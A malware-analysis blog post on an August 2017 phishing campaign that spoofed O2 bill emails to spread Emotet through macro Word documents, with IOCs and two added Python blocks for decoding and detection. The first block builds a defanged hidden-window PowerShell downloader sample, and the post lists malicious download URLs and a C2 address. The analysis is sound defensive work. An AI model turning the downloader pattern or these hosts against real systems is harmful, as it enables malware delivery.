SpiderLabs Blog

Emotet lives another day using Fake O2 invoice notifications

We witnessed a widespread phishing campaign targeting O2 customers that surfaced on 18th August 2017 and continued intermittently until 21st August 2017. Telefonica UK Limited, trading as O2, is a major telecom provider in the UK. In this campaign scammers sent out fake O2 invoice emails as spam. These phishing emails contained links to malicious Microsoft Word documents, which in turn infected victims with a banking trojan. The attack flow is shown here:

[Figure: attack flow diagram]

Analysis of the Email

The scammers used spoofed email addresses in the email "From" field and sent out the same emails using one of two subject lines:

  1. Subject: My O2 Business - Your O2 Bill is ready
  2. Subject: Your O2 bill is ready - (Victim's Name)

The fake email message appears as a legitimate automated O2 bill invoice that encourages victims to click on the "View Billing Statement" link, as shown in Figures 1 and 2.

Figure 1: O2 phishing email message

Figure 2: O2 phishing invoice message pointing to the malicious Word document

Analysis of the Phishing Link and the Malicious Word Document

Clicking on the link points the web browser to the phishing site (see Figure 3). The link appears to be hosted on a compromised web site that serves a malicious Word document, "O2 bill - 805985874058.doc" (MD5: 2E8BBD0C8B7DE7D5F4E541C192421451). This Word document contains a malicious obfuscated macro (see Figure 4):

Figure 3: Malicious Word document download via HTTP

Figure 4: Malicious macro

The macro executes a Base64-encoded PowerShell command (see Figure 5).

Figure 5: Encoded PowerShell command used by the macro

A decoded version of the command is shown in Figure 6.

Figure 6: Decoded version of the PowerShell command

Opening the macro-enabled Word document launches the PowerShell script, which downloads and executes a malware sample from the URL hxxp://wernerbernheim(.)com(.)uy/capacitacion/bMLTBrcIE/

The downloaded malware is saved to C:\Users\{user}\AppData\Local\Temp\{random}.exe and has MD5 D6EDE359E1ECBF8248B0FC8EF63CED7E.
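As an added illustration (not code from the post or from Trustwave), the following Python decodes a `-EncodedCommand` argument the way an analyst triages a macro like the one in Figures 5 and 6: it locates the flag (including its abbreviations), restores stripped Base64 padding, decodes the UTF-16LE script bytes with a UTF-8 fallback, and pulls out the URL, the drop path and the risky calls. The encoded sample is constructed here from a downloader-shaped script that reuses the post's defanged URL; it is not the campaign's actual command, and the helper names are my own.

```python
import base64
import re

# Constructed sample (not the actual payload from Figures 5/6): a downloader-shaped
# script using the post's defanged URL, so it is not a working downloader.
SAMPLE_SCRIPT = (
    "$c=New-Object System.Net.WebClient;"
    "$u='hxxp://wernerbernheim(.)com(.)uy/capacitacion/bMLTBrcIE/';"
    "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "$c.DownloadFile($u,$p);Start-Process $p"
)


def encode_command(script: str) -> str:
    """powershell.exe -EncodedCommand takes Base64 of the UTF-16LE script bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_sample_cmdline() -> str:
    """The kind of command line a macro hands to cmd.exe (constructed)."""
    return ("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
            + encode_command(SAMPLE_SCRIPT))


def find_encoded_argument(cmdline: str):
    """Return the token following -EncodedCommand or any abbreviation of it
    (-e, -ec, -enc, ...). -Exec / -ExecutionPolicy are not prefixes, so they
    do not match."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lower().lstrip("-/")
        if flag and "encodedcommand".startswith(flag):
            return tokens[i + 1]
    return None


def _decode_script_bytes(raw: bytes) -> str:
    """powershell.exe expects UTF-16LE; some loaders emit UTF-8, so fall back
    when the UTF-16 reading is mostly non-ASCII garbage."""
    if len(raw) % 2 == 0:
        text = raw.decode("utf-16-le", errors="replace")
        if sum(ch.isascii() for ch in text) >= 0.9 * len(text):
            return text
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(cmdline: str) -> str:
    b64 = find_encoded_argument(cmdline)
    if b64 is None:
        raise ValueError("no -EncodedCommand argument in command line")
    # Some loaders strip the '=' padding; restore it before strict decoding.
    b64 += "=" * (-len(b64) % 4)
    return _decode_script_bytes(base64.b64decode(b64, validate=True))


URL_RE = re.compile(r"h(?:xx|tt)ps?://[A-Za-z0-9._\-/()]+", re.I)
DROP_RE = re.compile(r"\$env:(?:TEMP|APPDATA|LOCALAPPDATA)[^;]*", re.I)
SUSPICIOUS = ("WebClient", "DownloadFile", "DownloadString",
              "Invoke-Expression", "IEX", "Start-Process")


def extract_indicators(script: str) -> dict:
    """Pull out what a defender blocks or hunts for: URLs, drop paths, risky calls."""
    lowered = script.lower()
    return {
        "urls": URL_RE.findall(script),
        "drop_paths": DROP_RE.findall(script),
        "suspicious": [t for t in SUSPICIOUS if t.lower() in lowered],
    }


def triage(cmdline: str) -> dict:
    script = decode_encoded_command(cmdline)
    return {"script": script, **extract_indicators(script)}


if __name__ == "__main__":
    for key, value in triage(build_sample_cmdline()).items():
        print(f"{key}: {value}")
```

The same decoder applies to process-creation telemetry: feed it the recorded command line of a `powershell.exe` child of `WINWORD.EXE` and alert on any decoded script that contains both a URL and a `DownloadFile`/`Start-Process` pair.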

Analysis of the Malware

The downloaded malware is a variant of the Emotet malware. Emotet is a notorious multi-faceted banking trojan that carries several modules with different behaviors, such as:

  • Info-stealing module (emails, PST files, browsers)
  • Email spamming modules
  • Denial of service module

Depending on the module behavior, it drops a malware component to one of the following paths:

  • %WINDIR%\system32\dcomevent.exe
  • %LOCALAPPDATA%\Microsoft\Windows\dcomevent.exe

For persistence, it creates the following registry keys:

  • HKLM\SYSTEM\CurrentControlSet\services\dcomevent
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run

It also tries to connect to its command-and-control (C2) server at IP 62.39.95.185 using HTTPS (see Figure 7).

Figure 7: HTTP traffic

The malware then loads its spam module and attempts to send out new spam/phishing emails to thousands of email addresses (see Figure 8). This is typical spambot behavior: it first performs DNS lookups on each target email domain and then delivers the spam to that domain's SMTP server.

Figure 8: A snapshot of the SMTP traffic used by the malware to send out spam

Following the link in the spammed email downloads the same malicious Word document, this time hosted on a different domain (see Figure 9).

Figure 9: Link to the malicious Word document sent out as spam by the malware

Indicators of Compromise (IOCs)

  • URL in the Email:
    • hxxp://marianamengote(.)com/RLDXAIYKZD2314573/
  • Malicious Word Document:
    • FileName: "O2 bill - 805985874058.doc"
    • MD5: 2E8BBD0C8B7DE7D5F4E541C192421451
  • URL to download Emotet:
    • hxxp://wernerbernheim(.)com(.)uy/capacitacion/bMLTBrcIE/
  • Emotet variant:
    • MD5: D6EDE359E1ECBF8248B0FC8EF63CED7E
    • C2: 62.39.95.185
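The following Python is an added example, not part of the original post: it applies the host indicators from the malware analysis section (dropped file paths, persistence keys), the C2 address from the traffic section, and the spambot fan-out behavior described above to a few constructed telemetry lines. The log format, host names, the resolved locations assumed for %WINDIR% and %LOCALAPPDATA%, and the SMTP fan-out threshold are all my assumptions. Because the Run key exists on every host, it is only matched when the value data points at the dropped dcomevent.exe.

```python
import re
from collections import defaultdict

# Indicators from the post. The C2 address is the one given in the traffic
# analysis section; the Run key is generic and is matched on its value data.
DROP_PATHS = {
    r"%windir%\system32\dcomevent.exe",
    r"%localappdata%\microsoft\windows\dcomevent.exe",
}
SERVICE_KEY = r"hklm\system\currentcontrolset\services\dcomevent"
RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"
C2_IP = "62.39.95.185"
SMTP_FANOUT_THRESHOLD = 5  # assumption: distinct SMTP peers per host before alerting

# Assumption: where the two environment variables usually resolve on a host,
# so that recorded absolute paths can be compared with the %VAR% forms above.
ENV_PREFIXES = [
    (re.compile(r"^c:\\windows", re.I), "%windir%"),
    (re.compile(r"^c:\\users\\[^\\]+\\appdata\\local", re.I), "%localappdata%"),
]

# Constructed telemetry, not real logs. Format: timestamp|host|event|subject|detail
SAMPLE_LOG = r"""
2017-08-18T10:02:11Z|HOST01|file_create|C:\Windows\System32\dcomevent.exe|
2017-08-18T10:02:12Z|HOST01|reg_set|HKLM\SYSTEM\CurrentControlSet\services\dcomevent\ImagePath|C:\Windows\System32\dcomevent.exe
2017-08-18T10:02:20Z|HOST01|netconn|62.39.95.185|443
2017-08-18T10:03:01Z|HOST01|netconn|198.51.100.11|25
2017-08-18T10:03:02Z|HOST01|netconn|198.51.100.12|25
2017-08-18T10:03:03Z|HOST01|netconn|198.51.100.13|25
2017-08-18T10:03:04Z|HOST01|netconn|198.51.100.14|25
2017-08-18T10:03:05Z|HOST01|netconn|198.51.100.15|25
2017-08-18T10:04:00Z|HOST02|file_create|C:\Users\alice\AppData\Local\Microsoft\Windows\dcomevent.exe|
2017-08-18T10:04:01Z|HOST02|reg_set|HKCU\Software\Microsoft\Windows\CurrentVersion\Run\dcomevent|C:\Users\alice\AppData\Local\Microsoft\Windows\dcomevent.exe
2017-08-18T10:05:00Z|HOST03|reg_set|HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive|C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe
2017-08-18T10:05:01Z|HOST03|file_create|C:\Users\bob\AppData\Local\Temp\report.docx|
2017-08-18T10:05:02Z|HOST03|netconn|203.0.113.9|443
2017-08-18T10:05:03Z|MAIL01|netconn|198.51.100.20|25
"""


def normalize_path(path: str) -> str:
    """Lower-case a recorded path and fold known prefixes back to %VAR% form."""
    p = path.lower()
    for pattern, token in ENV_PREFIXES:
        p = pattern.sub(token, p, count=1)
    return p


def parse_line(line: str) -> dict:
    ts, host, event, subject, detail = line.split("|", 4)
    return {"ts": ts, "host": host, "event": event,
            "subject": subject, "detail": detail}


def detect(log_text: str, fanout_threshold: int = SMTP_FANOUT_THRESHOLD) -> list:
    """Return (host, rule, evidence) tuples for every indicator hit."""
    alerts = []
    smtp_peers = defaultdict(set)  # host -> distinct destinations on port 25
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        host, kind, subj, detail = ev["host"], ev["event"], ev["subject"], ev["detail"]
        if kind == "file_create" and normalize_path(subj) in DROP_PATHS:
            alerts.append((host, "emotet_drop_path", subj))
        elif kind == "reg_set":
            key = subj.lower()
            if key.startswith(SERVICE_KEY) or (
                key.startswith(RUN_KEY) and "dcomevent.exe" in detail.lower()
            ):
                alerts.append((host, "emotet_persistence", subj))
        elif kind == "netconn":
            if subj == C2_IP:
                alerts.append((host, "emotet_c2", f"{subj}:{detail}"))
            if detail == "25":
                smtp_peers[host].add(subj)
    # Spambot fan-out: a workstation talking SMTP to many distinct servers,
    # which is what the DNS-lookup-then-deliver behaviour in Figure 8 looks like.
    for host, peers in sorted(smtp_peers.items()):
        if len(peers) >= fanout_threshold:
            alerts.append((host, "spambot_smtp_fanout",
                           f"{len(peers)} distinct SMTP peers"))
    return alerts


if __name__ == "__main__":
    for host, rule, evidence in detect(SAMPLE_LOG):
        print(f"{host:8} {rule:22} {evidence}")
```

The fan-out rule is the one that survives a change of file names or C2 address: a client host that opens SMTP sessions to many unrelated mail servers is behaving like the spam module regardless of which Emotet build dropped it, so the threshold should be tuned against known mail relays and excluded for them.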

Conclusion

Attackers are leveraging the simplicity of the email infrastructure to distribute banking trojans to victims worldwide. We observed one such targeted phishing campaign delivering counterfeit emails claiming to come from O2, a UK-based telecom company. The legitimate-looking messages pretend to deliver a billing invoice, but the included link leads to a malicious Word document. Opening the document attempts to install a variant of the notorious Emotet banking trojan. This variant is equipped with a spamming module that starts sending out spam messages containing infected links to email addresses worldwide. This attack flow (spam -> malicious link -> malicious document download -> trojan download and execution) appears to be increasingly common on the threat landscape, likely as a way to evade email gateways. Additionally, malware equipped with spamming modules, as used in such campaigns, is designed to perpetuate the attack. As a mitigation measure, customers should avoid opening email messages that appear suspicious, and in particular avoid opening unexpected Office documents containing macros.

Acknowledgements

We would like to thank Phil Hay for his valuable advice and guidance.
